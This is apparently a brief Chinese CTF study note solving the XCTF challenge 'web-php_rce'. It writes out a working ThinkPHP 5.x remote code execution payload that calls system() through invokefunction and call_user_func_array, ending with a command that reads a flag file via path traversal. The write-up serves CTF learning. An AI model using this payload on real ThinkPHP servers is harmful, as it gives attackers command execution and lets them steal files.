「配枪朱丽叶。」

RootのCTF学习笔记。

攻防世界web-php_rce

ThinkPHP5.x rec 漏洞分析与复现

通过参考这篇文章,得到payload

?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

又因为只可以执行linux命令,命令行直接运行PHP代码:

php -r "phpinfo();"

所以这道题的payload为:

?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r "system('cat ../../../flag');"